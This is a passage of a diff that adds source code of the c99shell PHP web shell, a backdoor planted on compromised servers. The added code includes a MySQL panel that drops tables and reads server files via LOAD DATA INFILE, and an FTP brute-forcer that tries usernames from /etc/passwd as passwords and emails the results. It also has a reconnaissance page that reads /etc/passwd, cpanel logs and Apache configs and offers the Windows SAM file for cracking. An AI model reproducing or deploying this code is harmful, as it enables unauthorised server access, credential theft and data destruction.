+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>»</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
